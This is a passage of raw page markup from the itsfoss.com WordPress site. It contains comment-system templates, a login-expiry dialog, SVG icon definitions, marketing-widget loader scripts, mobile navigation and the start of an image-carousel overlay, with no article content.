</script><script type="text/template" id="comments-create">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</script><script type="text/template" id="comments-deleted"><div class="tcm-deleted-comment clear-this">
	<div class="deleted-header">
		<div class="moderation-img no-image" data-social-avatar="<#= comment.get('social_avatar') #>" data-email="<#= comment.get('comment_author_email') #>" data-src="<#= comment.get('photo_src') #>" style="background-image: url(<#= comment.get('author_avatar_urls') #>);"></div>
		<div class="deleted-header-text">
			<strong>
				<#= comment.get('author_name') #>
			</strong>
			<span>
				<#= comment.get('formatted_date') #>
			</span>
		</div>
	</div>
	<div class="deleted-text">
		<p class="deleted-info-text tcm-color-ac">
			<# if ( comment.get('status') === 'spam' ) { #>
			<span>This comment was marked as spam</span>
			<# } else { #>
			<span>This comment was marked as trash</span>
			<# } #>
			<a href="#" data-key="z" class="undo-action">Undo</a>
		</p>

		<p>
			<#= comment.get('comment_content') #>
		</p>
	</div>
</div>
</script><script type="text/template" id="comments-item">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</script><script type="text/template" id="comments-lazy-loading"><button class="tcm-loader">
	<div style="display: inline-block" class="tcm-dot-loader done">
		<span class="inner1"></span>
		<span class="inner2"></span>
		<span class="inner3"></span>
	</div>
	<p>
		<#= ThriveComments.util.render_label('load_comments') #>
	</p>
</button>
<# if ( comments_rendered > 2 && ! ThriveComments.close_comments ) { #>
<div class="add-comment tcm-background-color-ac">
	<p>
			<span class="add-comment-icon">
				<svg class="add-comment-svg"><use xlink:href="#tcm-add-comment"></use></svg>			</span>
		<#= ThriveComments.util.render_label('add_comment') #></#></p>
</div>
<# } #>
<# if ( showPoweredBy ) { #>
<div class="tcm-powered-by">
		<a href="https://thrivethemes.com/comments/" title="Powered by Thrive Comments" target="_blank">
			<span class="tcm-footer-logo">
				<svg class="logo-footer-svg"><use xlink:href="#tcm-logo-footer"></use></svg>			</span>

		<span>
			Powered by 		</span>
		<span>
			Thrive Comments		</span>
	</a>
</div>
<# } #>

<# if ( ! ThriveComments.close_comments && ThriveComments.email_services.length !== 0 ) { #>
<div class="tcm-align-right">

	<a href="javascript:void(0)" class="tcm-link-unsubscribe" title="<#= ThriveComments.util.render_label('unsubscribe') #>"
	<# if ( - 1 === ThriveComments.util.get_cookie( 'subscribed_posts' ).indexOf( ThriveComments.post.ID ) || ( typeof ThriveComments.current_user.ID === 'undefined' ) ) { #> hidden <# } #> >
	<#= ThriveComments.util.render_label('unsubscribe') #></a>

	<a href="javascript:void(0)" class="tcm-link-subscribe" title="<#= ThriveComments.util.render_label('subscribe') #>"
	<# if ( - 1 !== ThriveComments.util.get_cookie( 'subscribed_posts' ).indexOf( ThriveComments.post.ID ) ) { #> hidden <# } #> >
	<#= ThriveComments.util.render_label('subscribe') #></a>

	<div id="tcm-subscribe-form" class="tcm-subscribe-form" hidden>
		<div class="tcm-error-message"></div>
		<input class="form-input tcm-subscriber-email" type="text" name="Email" placeholder="<#= ThriveComments.util.render_label('email') #>"/>
		<button class="submit-subscribe-post"><#= ThriveComments.util.render_label('subscribe') #></a></button>
	</div>

	<# if ( typeof ThriveComments.current_user.ID === 'undefined' ) { #>
	<div id="tcm-unsubscribe-form" class="tcm-subscribe-form"
	<# if ( - 1 === ThriveComments.util.get_cookie( 'subscribed_posts' ).indexOf( ThriveComments.post.ID ) ) { #> hidden <# } #> >
	<div class="tcm-error-message"></div>
	<input class="form-input tcm-unsubscriber-email" type="text" name="Email" placeholder="<#= ThriveComments.util.render_label('email') #>"/>
	<button class="submit-unsubscribe-post"><#= ThriveComments.util.render_label('unsubscribe') #></a></button>
</div>
<# } #>
<p class="tcm-already-subscribed" hidden> Already subscribed! </p>

</div>
<# } #>
<div class="clear"></div>
</script><script type="text/template" id="comments-list"><div id="tcm-comments-filter" class="tcm-comments-filter">
	<div class="tcm-lazy-loader"></div>
</div></script><script type="text/template" id="comments-moderation"><div class="tcm-moderate-dots tcm-background-color-ac-h">
	<span class="moderate-dot"></span>
	<span class="moderate-dot"></span>
	<span class="moderate-dot"></span>
</div>

<div class="tcm-dropdown-moderate">
	<# _.each( actions, function( action, key ){ #>
	<div class="tcm-dropdown-moderate-element" data-fn="<#= action.fn #>" data-value="<#= action.value #>"><#= action.text #></div>
	<# }) #>
</div></script><script type="text/template" id="comments-sort"><div class="tcm-comments-filters">
	<div class="left">
		<div class="tcm-comments-number">
			<#= ThriveComments.util.render_label( 'number_of_comments', 'comment_count' ) #>
		</div>
	</div>
	<div class="right">
		<label for="sort-by">
			<#= ThriveComments.util.render_label('show_comments_first','','before') #>
		</label>
		<div name="sort-by" id="tcm-sort-by" class="tcm-dropdown tcm-filter-dropdown tcm-really-random">
            <span class="tcm-toggle-button current-sorting">
                <# if ( ThriveComments.settings.comment_order === 'desc') { #>
					<#= ThriveComments.util.render_label( 'newest') #>
					<# } else if( ThriveComments.settings.comment_order === 'asc') { #>
					<#= ThriveComments.util.render_label( 'oldest') #>
					<# } else {#>
				<# if( ThriveComments.settings.tcm_vote_type != 'no_vote' ) {#>
					<#= ThriveComments.util.render_label( 'top_rated') #>
					<# } #>
				<# } #>
			</span>

			<span class="dropdown-arrow-comments">
						<svg class="sort-by-dropdown-svg"><use xlink:href="#tcm-sort-by-dropdown"></use></svg>			</span>

			<div class="tcm-dropdown-content">

				<div data-value="desc" class="tcm-dropdown-element tcm-sort-by">
					<#= ThriveComments.util.render_label( 'newest') #>
				</div>
				<div data-value="asc" class="tcm-dropdown-element tcm-sort-by">
					<#= ThriveComments.util.render_label( 'oldest') #>
				</div>
				<# if(ThriveComments.settings.tcm_vote_type != 'no_vote'){#>
				<div data-value="top-rated" class="tcm-dropdown-element tcm-sort-by">
					<#= ThriveComments.util.render_label( 'top_rated') #>
				</div>

				<# } #>

			</div>
		</div>
		<label for="sort-by">
			<#= ThriveComments.util.render_label('show_comments_first','','after') #>
		</label>
	</div>
</div>
<div class="clear"></div>
<# if ( ThriveComments.close_comments ) { #>
<div class="tcm-closed-comments" style="text-align: center">
	<p>
		<#= ThriveComments.util.render_label('close_comments') #>
	</p>
</div>
<# } #></script> <div id="wp-auth-check-wrap" class="hidden">
<div id="wp-auth-check-bg"></div>
<div id="wp-auth-check">
<button type="button" class="wp-auth-check-close button-link"><span class="screen-reader-text">Close dialog</span></button>
<div id="wp-auth-check-form" class="loading" data-src="https://itsfoss.com/wp-login.php?interim-login=1&#038;wp_lang=en_US"></div>
<div class="wp-auth-fallback">
<p><b class="wp-auth-fallback-expired" tabindex="0">Session expired</b></p>
<p><a href="https://itsfoss.com/wp-login.php" target="_blank">Please log in again.</a>
The login page will open in a new tab. After logging in you can close it and return to this page.</p>
</div>
</div>
</div>
<script>requestAnimationFrame(() => document.body.classList.add( "stk--anim-init" ))</script><div style="display: none;">
<svg style="position: absolute; width: 0; height: 0; overflow: hidden;" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" xml:space="preserve">
<defs>
<symbol id="tcm-reply" viewBox="0 0 100 100">
<g>
<path d="M69.9,38.1L69.9,38.1c-1.5-3.7-4.7-6.4-7.4-9.2c-2.8-2.8-6.3-4.7-9.9-6.3c-3.7-1.6-7.7-2.4-11.7-2.4h-11
					l4.7-4.8c3.4-3.4,3.4-9,0-12.4c-3.4-3.4-8.9-3.4-12.2,0L2.8,22.7c-3.4,3.4-3.4,9,0,12.4l19.4,19.7c1.7,1.7,3.9,2.6,6.1,2.6
					c2.2,0,4.4-0.9,6.1-2.6c3.4-3.4,3.4-9,0-12.4l-4.6-4.6h10.9c3.4,0,6.6,1.4,9.1,3.8l4.8,4.8c1.2,2,3,3.4,5.1,4.1
					c2.1,0.6,4.5,0.4,6.6-0.7C70.5,47.5,72,42.3,69.9,38.1z" />
<ellipse cx="81.1" cy="60.8" rx="8.5" ry="8.6" />
</g>
</symbol>
<symbol id="tcm-icon-thumb_down" viewBox="0 0 24 24">
<g>
<path d="M18.984 3h4.031v12h-4.031v-12zM15 3c1.078 0 2.016 0.938 2.016 2.016v9.984c0 0.563-0.234 1.031-0.609
			1.406l-6.563 6.609-1.078-1.078c-0.281-0.281-0.422-0.609-0.422-1.031v-0.328l0.984-4.594h-6.328c-1.078 0-2.016-0.891-2.016-1.969l0.047-0.094h-0.047v-1.922c0-0.281
			0.047-0.516 0.141-0.75l3.047-7.031c0.281-0.703 0.984-1.219 1.828-1.219h9z" />
</g>
</symbol>
<symbol id="tcm-icon-thumb_up" viewBox="0 0 24 24">
<g>
<path d="M23.016 9.984l-0.047 0.094h0.047v1.922c0 0.281-0.047 0.516-0.141 0.75l-3.047 7.031c-0.281 0.703-0.984
			1.219-1.828 1.219h-9c-1.078 0-2.016-0.938-2.016-2.016v-9.984c0-0.563 0.234-1.031 0.609-1.406l6.563-6.609 1.078
			1.078c0.281 0.281 0.422 0.609 0.422 1.031v0.328l-0.984 4.594h6.328c1.078 0 2.016 0.891 2.016 1.969zM0.984 21v-12h4.031v12h-4.031z" />
</g>>
</symbol>
<symbol id="tcm-add-comment" viewBox="0 0 267.3 245">
<path style="fill:#FFFFFF;" class="st0" d="M265.7,61C259.6,27.5,230.3,2,195.1,2H72.5C33,2,0.8,34.2,0.8,73.8v77c0,0.1,0,0.1,0,0.2v81.6
			c0,0-1.8,11.1,9.7,11.1c0,0,4.2,1,13.1-4.6l46.8-43.2h124.6c39.5,0,71.7-32.2,71.7-71.7V83.8L265.7,61z M78.4,114
			c-8.1,0-14.6-6.5-14.6-14.6c0-8.1,6.5-14.6,14.6-14.6S93,91.4,93,99.5C93,107.5,86.5,114,78.4,114z M137.5,114
			c-8.1,0-14.6-6.5-14.6-14.6c0-8.1,6.5-14.6,14.6-14.6c8.1,0,14.6,6.5,14.6,14.6C152.1,107.5,145.5,114,137.5,114z M196.5,114
			c-8.1,0-14.6-6.5-14.6-14.6c0-8.1,6.5-14.6,14.6-14.6c8.1,0,14.6,6.5,14.6,14.6C211.1,107.5,204.6,114,196.5,114z" />
</symbol>
<symbol id="tcm-logo-footer" viewBox="0 0 130 100">
<path style="fill:#434343;" class="st0" d="M108.8,26.5C106.7,14.9,96.5,6.1,84.4,6.1H41.9C28.2,6.1,17,17.2,17,30.9v26.7c0,0,0,0,0,0.1v28.2
			c0,0-0.6,3.8,3.4,3.8c0,0,1.5,0.4,4.6-1.6l16.2-14.9h12.1c0.1-0.2,0.3-0.4,0.4-0.6l2.2-3.1c0.4-0.6,1.9-2.3,3.1-3.6H37.6
			c-1.1,0-2.1,0.6-2.8,1.4l0,0L24.1,78.6V58.2c0-0.2,0.1-0.4,0.1-0.6V30.9c0-9.7,7.9-17.6,17.6-17.6h42.5c9.7,0,17.6,7.9,17.6,17.6
			v16.9c2.6-0.4,5.3-0.6,7.2-0.7V34.4L108.8,26.5z" />
<path style="fill:#57A245;" class="st1" d="M43.7,39.9c-3.3,0-6-2.7-6-6c0-3.3,2.7-6,6-6h38.9c3.3,0,6,2.7,6,6c0,3.3-2.7,6-6,6H43.7z" />
<path style="fill:#434343;" class="st0" d="M43.7,52.2h38.9c2.4,0,4.3-1.9,4.3-4.3s-1.9-4.3-4.3-4.3H43.7c-2.4,0-4.3,1.9-4.3,4.3S41.3,52.2,43.7,52.2" />
<path style="fill-rule:evenodd;clip-rule:evenodd;fill:#57A245;" class="st2" d="M118.2,52.4c-1.2,0-1.6,0.2-2.4,0.5c-0.9,0.3-1.9,1-2.6,1.7l-1.8,1.7c-0.2,0.2-0.2,0.2-0.3,0.4
			c-3.4,4.2-4.1,4.9-6.8,10.2c-1.2,2.5-2.7,4.8-4.2,7.1c-1,1.6-2,3.2-3.2,4.6c-0.1,0.2-0.2,0.2-0.3,0.4c-0.7,0.9-1.7,1.7-2.5,2.5
			c-0.6,0.5-1.3,1-1.9,1.5c-0.6,0.4-1.1,0.8-1.7,1.1l-0.9,0.5c-0.2,0.1-0.3,0.2-0.5,0.3c-0.1,0-0.3,0.2-0.4,0.2
			c-0.2,0.1-0.4,0.2-0.5,0.2c-3.7,1.8-8.5,3-12.7,3.4L72.7,89c-0.8,0.1-2.8,0.2-4.7,0.2c-1.6,0-3,0-3.5-0.2l0.3-0.7
			c0.6-1.4,1.3-2.8,2.1-4.1c0.1-0.2,0.2-0.4,0.4-0.6l1.5-2.6l3.9-5.3l3.5-3.6l0.2-0.2c0.2-0.1,0.2-0.1,0.3-0.2l0.8-0.7
			c0.1-0.1,0.2-0.1,0.3-0.2c0.2-0.2,0.3-0.3,0.5-0.4l3.7-2.5c1.3-0.8,2.6-1.6,3.8-2.3l4-2.1c1.5-0.8,4-2.1,5.5-2.7l4.1-1.9
			c-0.6,0.1-1.4,0.4-1.9,0.6c-0.6,0.2-1.3,0.4-1.9,0.6l-3.8,1.3c-1.8,0.6-3.6,1.4-5.5,2.1l-3.5,1.5c-1.3,0.5-3.3,1.6-4.7,2.3
			c-1.5,0.8-2.9,1.8-4.3,2.6l-4.8,3.4c-0.1,0.1-0.2,0.2-0.4,0.3l-2.7,2.3c-0.8,0.8-1.8,1.7-2.5,2.5c-0.2,0.2-0.2,0.2-0.3,0.4
			c-0.7,0.7-1.3,1.6-1.9,2.4c-0.9,1.2-1.8,2.5-2.5,3.8l-1.3,2.5c-0.5,1-2.7,6-2.8,7.4h-0.2c0-0.2-0.5-2.5-0.7-4.4v-1.6
			c0-0.1,0-0.1,0-0.2c0.2-1.1,0.1-1.8,0.3-3.1c0.6-3.6,2.2-7.4,4.2-10.4l2.1-3c0.6-0.8,2.8-3.4,3.5-3.8c0.6-0.5,1.2-1.3,1.9-1.8
			c0.3-0.2,0.6-0.5,0.9-0.8c0.4-0.2,0.6-0.5,1-0.8l2-1.5c2-1.5,4.2-2.8,6.4-3.8c2.4-1.2,4.7-2.1,7.2-3.1c3.2-1.3,7.6-2.2,10.9-2.9
			c3.5-0.7,12.3-2.3,16.6-2.3h0.9C114,51.2,117.4,51.2,118.2,52.4z" />
<path style="fill:none;" class="st3" d="M99.5,58.5c0.4,0,0.2,0,0.2-0.1C99.4,58.4,99.6,58.4,99.5,58.5z M99.5,58.5c0.1-0.1-0.1-0.1,0.2-0.1
			C99.7,58.5,99.9,58.5,99.5,58.5 M99.9,58.3l-0.1,0.1 M99.5,58.5c-0.6,0.1-1.4,0.4-1.9,0.6c-0.6,0.2-1.3,0.4-1.9,0.6l-3.8,1.3
			c-1.8,0.6-3.6,1.4-5.5,2.1l-3.5,1.5c-1.3,0.5-3.3,1.6-4.7,2.3c-1.5,0.8-2.9,1.8-4.3,2.6l-4.8,3.4c-0.1,0.1-0.2,0.2-0.4,0.3l-2.7,2.3
			c-0.8,0.8-1.8,1.7-2.5,2.5c-0.2,0.2-0.2,0.2-0.3,0.4c-0.7,0.7-1.3,1.6-1.9,2.4c-0.9,1.2-1.8,2.5-2.5,3.8l-1.3,2.5
			c-0.5,1-2.7,6-2.8,7.4h-0.2c0-0.2-0.5-2.5-0.7-4.4v-1.6c0-0.1,0-0.1,0-0.2c0.2-1.1,0.1-1.8,0.3-3.1c0.6-3.6,2.2-7.4,4.2-10.4l2.1-3
			c0.6-0.8,2.8-3.4,3.5-3.8c0.6-0.5,1.2-1.3,1.9-1.8c0.3-0.2,0.6-0.5,0.9-0.8c0.4-0.2,0.6-0.5,1-0.8l2-1.5c2-1.5,4.2-2.8,6.4-3.8
			c2.4-1.2,4.7-2.1,7.2-3.1c3.2-1.3,7.6-2.2,10.9-2.9c3.5-0.7,12.3-2.3,16.6-2.3h0h0.2h0.6c2.2,0,5.6,0.1,6.4,1.3
			c-1.2,0-1.6,0.2-2.4,0.5c-0.9,0.3-1.9,1-2.6,1.7l-1.8,1.7c-0.2,0.2-0.2,0.2-0.3,0.4c-3.4,4.2-4.1,4.9-6.8,10.2
			c-1.2,2.5-2.7,4.8-4.2,7.1c-1,1.6-2,3.2-3.2,4.6c-0.1,0.2-0.2,0.2-0.3,0.4c-0.7,0.9-1.7,1.7-2.5,2.5c-0.6,0.5-1.3,1-1.9,1.5
			c-0.6,0.4-1.1,0.8-1.7,1.1l-0.9,0.5c-0.2,0.1-0.3,0.2-0.5,0.3c-0.1,0-0.3,0.2-0.4,0.2c-0.2,0.1-0.4,0.2-0.5,0.2
			c-3.7,1.8-8.5,3-12.7,3.4L72.7,89c-0.8,0.1-2.8,0.2-4.7,0.2c-1.6,0-3,0-3.5-0.2l0.3-0.7c0.6-1.4,1.3-2.8,2.1-4.1
			c0.1-0.2,0.2-0.4,0.4-0.6l1.5-2.6l3.9-5.3l3.5-3.6c0.1-0.1,0.2-0.2,0.2-0.2c0.2-0.1,0.2-0.1,0.3-0.2l0.8-0.7
			c0.1-0.1,0.2-0.1,0.3-0.2c0.2-0.2,0.3-0.3,0.5-0.4l3.7-2.5c1.3-0.8,2.6-1.6,3.8-2.3l4-2.1c1.5-0.8,4-2.1,5.5-2.7L99.5,58.5" />
</symbol>
<symbol id="tcm-related-posts-arrow" viewBox="0 0 16 16">
<path class="st0" d="M8,15.9c-4.4,0-7.9-3.5-7.9-7.9S3.6,0.1,8,0.1s7.9,3.5,7.9,7.9S12.4,15.9,8,15.9z M8,2.4C4.9,2.4,2.4,4.9,2.4,8
			s2.5,5.6,5.6,5.6s5.6-2.5,5.6-5.6S11.1,2.4,8,2.4z M11.9,8.3l-3.3,3.3c-0.1,0.1-0.2,0.1-0.2,0.1c-0.2,0-0.3-0.2-0.3-0.3v-2H4.4
			C4.2,9.3,4.1,9.2,4.1,9V7c0-0.2,0.2-0.3,0.3-0.3H8v-2c0-0.2,0.1-0.3,0.3-0.3c0.1,0,0.2,0,0.2,0.1l3.3,3.3C11.9,7.9,12,7.9,12,8
			S11.9,8.2,11.9,8.3z" />
</symbol>
<symbol id="tcm-sort-by-dropdown" viewBox="0 0 12 7">
<path style="fill:#6E767D;" class="st0" d="M0.3,1.5l5.2,5.2c0,0,0.5,0.5,1.1,0l5.2-5.2c0,0,0.4-0.4,0.2-0.9c0,0-0.1-0.4-0.7-0.4H0.8c0,0-0.5,0-0.7,0.4
			C0.1,0.5-0.2,1,0.3,1.5z" />
</symbol>
<symbol id="tcm-author-icon" viewBox="0 0 1020 1080">
<polygon style="fill:#474F57" class="st0" points="44.5,882.9 251.4,1081 251.4,889.8 " />
<path style="fill:#6E767D" class="st1" d="M937.8,891.8H81.2c-44.3,0-80.6-36.3-80.6-80.6V82.7c0-44.3,36.3-80.6,80.6-80.6h856.6
			c44.3,0,80.6,36.3,80.6,80.6v728.5C1018.4,855.5,982.1,891.8,937.8,891.8z" />
<g>
<path style="fill:#6E767D" class="st2" d="M732,688.3c-0.5,0.1-2.7,0.5-6.3,1.1c-142.4,25.4-168.6,29.8-171.6,30.1c-7,0.8-12.3,0.4-16-1.3
				c-2.4-1-3.6-2.3-4-2.8c0.2-1,1.4-3.3,2.2-4.7c0.7-1.4,1.6-3,2.3-4.6c4.9-11.1,1.5-22.4-8.9-29.5c-7.8-5.3-18.1-7.4-30.6-6.3
				c-7.5,0.6-138.9,22.6-211.1,34.7l-35.4,27.7c82.6-13.9,240.1-40.2,248.4-41c7.4-0.6,13.2,0.3,16.7,2.7c2,1.4,1.8,1.8,1.3,3.1
				c-0.4,0.9-1,2-1.6,3.2c-2.4,4.4-5.6,10.5-4.5,18c1.2,8.2,7.3,15.3,16.7,19.4c5.3,2.3,11.4,3.5,18.4,3.5c2.8,0,5.7-0.2,8.8-0.5
				c5.7-0.7,63.8-10.9,172.9-30.3c3.6-0.6,5.8-1,6.3-1.1c5.9-1,9.8-6.6,8.7-12.5C743.4,691.2,737.8,687.3,732,688.3L732,688.3z
				 M732,688.3" />
<path style="fill:#FFFFFF" class="st2" d="M349.8,583.9l-91.7,95.5c-10.1,10.5-17.2,23.5-20.6,37.7l130.2-102c40.8,18,73.3,23.7,98.3,23.7
				c43.8,0,64.2-17.7,64.2-17.7c-40.8-21.2-46.6-60.6-46.6-60.6c31.3,13.2,96.4,28.7,96.4,28.7c86.5-57.5,131.7-181.9,131.7-181.9
				c-9,2.5-17.5,3.5-25.6,3.5c-40.6,0-68.5-25.9-68.5-25.9l113-24.5c37.6-76.7,41.2-211.1,41.2-211.1L428.2,453.5
				C389.2,487.9,361.9,533.4,349.8,583.9L349.8,583.9z M349.8,583.9" />
</g>
</symbol>
<symbol id="tcm-bulk-action-arrow" viewBox="0 0 12 7">
<path style="fill:#6E767D" class="st0" d="M0.3,1.5l5.2,5.2c0,0,0.5,0.5,1.1,0l5.2-5.2c0,0,0.4-0.4,0.2-0.9c0,0-0.1-0.4-0.7-0.4H0.8c0,0-0.5,0-0.7,0.4
			C0.1,0.5-0.2,1,0.3,1.5z" />
</symbol>
</defs>
</svg>
</div><a id="kt-scroll-up" tabindex="-1" aria-hidden="true" aria-label="Scroll to top" href="#wrapper" class="kadence-scroll-to-top scroll-up-wrap scroll-ignore scroll-up-side-right scroll-up-style-outline vs-lg-true vs-md-true vs-sm-false"><span class="kadence-svg-iconset"><svg aria-hidden="true" class="kadence-svg-icon kadence-arrow-up-svg" fill="currentColor" version="1.1" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><title>Scroll to top</title><path d="M5.707 12.707l5.293-5.293v11.586c0 0.552 0.448 1 1 1s1-0.448 1-1v-11.586l5.293 5.293c0.391 0.391 1.024 0.391 1.414 0s0.391-1.024 0-1.414l-7-7c-0.092-0.092-0.202-0.166-0.324-0.217s-0.253-0.076-0.383-0.076c-0.256 0-0.512 0.098-0.707 0.293l-7 7c-0.391 0.391-0.391 1.024 0 1.414s1.024 0.391 1.414 0z"></path>
</svg></span></a><button id="kt-scroll-up-reader" href="#wrapper" aria-label="Scroll to top" class="kadence-scroll-to-top scroll-up-wrap scroll-ignore scroll-up-side-right scroll-up-style-outline vs-lg-true vs-md-true vs-sm-false"><span class="kadence-svg-iconset"><svg aria-hidden="true" class="kadence-svg-icon kadence-arrow-up-svg" fill="currentColor" version="1.1" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><title>Scroll to top</title><path d="M5.707 12.707l5.293-5.293v11.586c0 0.552 0.448 1 1 1s1-0.448 1-1v-11.586l5.293 5.293c0.391 0.391 1.024 0.391 1.414 0s0.391-1.024 0-1.414l-7-7c-0.092-0.092-0.202-0.166-0.324-0.217s-0.253-0.076-0.383-0.076c-0.256 0-0.512 0.098-0.707 0.293l-7 7c-0.391 0.391-0.391 1.024 0 1.414s1.024 0.391 1.414 0z"></path>
</svg></span></button><div id="om-by19m9tmzfns6oco-holder"></div><script>var by19m9tmzfns6oco,by19m9tmzfns6oco_poll=function(){var r=0;return function(n,l){clearInterval(r),r=setInterval(n,l)}}();!function(e,t,n){if(e.getElementById(n)){by19m9tmzfns6oco_poll(function(){if(window['om_loaded']){if(!by19m9tmzfns6oco){by19m9tmzfns6oco=new OptinMonsterApp();return by19m9tmzfns6oco.init({"u":"447.470037","staging":0,"dev":0,"beta":0});}}},25);return;}var d=false,o=e.createElement(t);o.id=n,o.src="https://a.omappapi.com/app/js/api.min.js",o.async=true,o.onload=o.onreadystatechange=function(){if(!d){if(!this.readyState||this.readyState==="loaded"||this.readyState==="complete"){try{d=om_loaded=true;by19m9tmzfns6oco=new OptinMonsterApp();by19m9tmzfns6oco.init({"u":"447.470037","staging":0,"dev":0,"beta":0});o.onload=o.onreadystatechange=null;}catch(t){}}}};(document.getElementsByTagName("head")[0]||document.documentElement).appendChild(o)}(document,"script","omapi-script");</script><div id="om-pztb1uabhcye9ksm-holder"></div><script>var pztb1uabhcye9ksm,pztb1uabhcye9ksm_poll=function(){var r=0;return function(n,l){clearInterval(r),r=setInterval(n,l)}}();!function(e,t,n){if(e.getElementById(n)){pztb1uabhcye9ksm_poll(function(){if(window['om_loaded']){if(!pztb1uabhcye9ksm){pztb1uabhcye9ksm=new OptinMonsterApp();return pztb1uabhcye9ksm.init({"u":"447.408081","staging":0,"dev":0,"beta":0});}}},25);return;}var d=false,o=e.createElement(t);o.id=n,o.src="https://a.omappapi.com/app/js/api.min.js",o.async=true,o.onload=o.onreadystatechange=function(){if(!d){if(!this.readyState||this.readyState==="loaded"||this.readyState==="complete"){try{d=om_loaded=true;pztb1uabhcye9ksm=new OptinMonsterApp();pztb1uabhcye9ksm.init({"u":"447.408081","staging":0,"dev":0,"beta":0});o.onload=o.onreadystatechange=null;}catch(t){}}}};(document.getElementsByTagName("head")[0]||document.documentElement).appendChild(o)}(document,"script","omapi-script");</script><style>.presto-iframe-fallback-container{position:relative;padding-bottom:56.25%;padding-top:30px;height:0;overflow:hidden}.presto-iframe-fallback-container embed,.presto-iframe-fallback-container iframe,.presto-iframe-fallback-container object{position:absolute;top:0;left:0;width:100%;height:100%}</style><script defer>
                window.addEventListener("load", function(event) {
                    setTimeout(function() {
                        var deferVideo = document.getElementsByClassName("presto-fallback-iframe");
                        if (!deferVideo.length) return;
                        Array.from(deferVideo).forEach(function(video) {
                            video && video.setAttribute("src", video.getAttribute("data-src"));
                        });
                    }, 2000);
                }, false);
            </script> <div id="mobile-drawer" class="popup-drawer popup-drawer-layout-sidepanel popup-drawer-animation-fade popup-drawer-side-right" data-drawer-target-string="#mobile-drawer">
<div class="drawer-overlay" data-drawer-target-string="#mobile-drawer"></div>
<div class="drawer-inner">
<div class="drawer-header">
<button class="menu-toggle-close drawer-toggle" aria-label="Close menu" data-toggle-target="#mobile-drawer" data-toggle-body-class="showing-popup-drawer-from-right" aria-expanded="false" data-set-focus=".menu-toggle-open">
<span class="toggle-close-bar"></span>
<span class="toggle-close-bar"></span>
</button>
</div>
<div class="drawer-content mobile-drawer-content content-align-left content-valign-top">
<div class="site-header-item site-header-focus-item site-header-item-mobile-navigation mobile-navigation-layout-stretch-false" data-section="kadence_customizer_mobile_navigation">
<nav id="mobile-site-navigation" class="mobile-navigation drawer-navigation drawer-navigation-parent-toggle-false" role="navigation" aria-label="Primary Mobile Navigation">
<div class="mobile-menu-container drawer-menu-container">
<ul id="mobile-menu" class="menu has-collapse-sub-nav"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-93490"><a href="https://itsfoss.com/about/">About</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent menu-item-93493"><a href="https://itsfoss.com/all-blog-posts/">Latest</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-93492"><a target="_blank" rel="noopener" href="https://news.itsfoss.com/">Linux News</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-93494"><a target="_blank" rel="noopener" href="https://itsfoss.community/">Forum</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-93576"><a target="_blank" rel="noopener" href="https://linuxhandbook.com/">Linux Server Stuff</a></li>
<li id="menu-item-siq-selectbox" class="menu-item ">
<div id="siq-menu-searchbox-wrap" class="siq-menu-searchbox-wrap "><div id="siq-expsearch-cont" class="siq-expsearch-cont">
<form class="siq-expsearch" action="https://itsfoss.com">
<input type="search" placeholder="Search" name="s" class="siq-expsearch-input">
<span class="siq-expsearch-icon" style='color:#000000'></span>
</form>
</div></div></li></ul> </div>
</nav>
</div>
</div>
</div>
</div>
<div id="jp-carousel-loading-overlay">
<div id="jp-carousel-loading-wrapper">
<span id="jp-carousel-library-loading">&nbsp;</span>
</div>
</div>
<div class="jp-carousel-overlay" style="display: none;">
<div class="jp-carousel-container">

<div class="jp-carousel-wrap swiper-container jp-carousel-swiper-container jp-carousel-transitions" itemscope itemtype="https://schema.org/ImageGallery">
<div class="jp-carousel swiper-wrapper"></div>
<div class="jp-swiper-button-prev swiper-button-prev">
<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">
<mask id="maskPrev" mask-type="alpha" maskUnits="userSpaceOnUse" x="8" y="6" width="9" height="12">
<path d="M16.2072 16.59L11.6496 12L16.2072 7.41L14.8041 6L8.8335 12L14.8041 18L16.2072 16.59Z" fill="white" />
</mask>
<g mask="url(#maskPrev)">
<rect x="0.579102" width="23.8823" height="24" fill="#FFFFFF" />
</g>
</svg>
</div>
<div class="jp-swiper-button-next swiper-button-next">
<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">
<mask id="maskNext" mask-type="alpha" maskUnits="userSpaceOnUse" x="8" y="6" width="8" height="12">
<path d="M8.59814 16.59L13.1557 12L8.59814 7.41L10.0012 6L15.9718 12L10.0012 18L8.59814 16.59Z" fill="white" />
</mask>
<g mask="url(#maskNext)">
<rect x="0.34375" width="23.8822" height="24" fill="#FFFFFF" />
</g>
</svg>
</div>
</div>

<div class="jp-carousel-close-hint">
<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">
<mask id="maskClose" mask-type="alpha" maskUnits="userSpaceOnUse" x="5" y="5" width="15" height="14">
<path d="M19.3166 6.41L17.9135 5L12.3509 10.59L6.78834 5L5.38525 6.41L10.9478 12L5.38525 17.59L6.78834 19L12.3509 13.41L17.9135 19L19.3166 17.59L13.754 12L19.3166 6.41Z" fill="white" />
</mask>
<g mask="url(#maskClose)">
<rect x="0.409668" width="23.8823" height="24" fill="#FFFFFF" />
</g>
</svg>
</div>

<div class="jp-carousel-info">
<div class="jp-carousel-info-footer">
<div class="jp-carousel-pagination-container">
<div class="jp-swiper-pagination swiper-pagination"></div>
<div class="jp-carousel-pagination"></div>
</div>
<div class="jp-carousel-photo-title-container">
<h2 class="jp-carousel-photo-caption"></h2>
</div>
<div class="jp-carousel-photo-icons-container">
<a href="#" class="jp-carousel-icon-btn jp-carousel-icon-info" aria-label="Toggle photo metadata visibility">
<span class="jp-carousel-icon">
<svg width="25" height="24" viewBox="0 0 25 24" fill="none" xmlns="http://www.w3.org/2000/svg">
<mask id="maskInfo" mask-type="alpha" maskUnits="userSpaceOnUse" x="2" y="2" width="21" height="20">
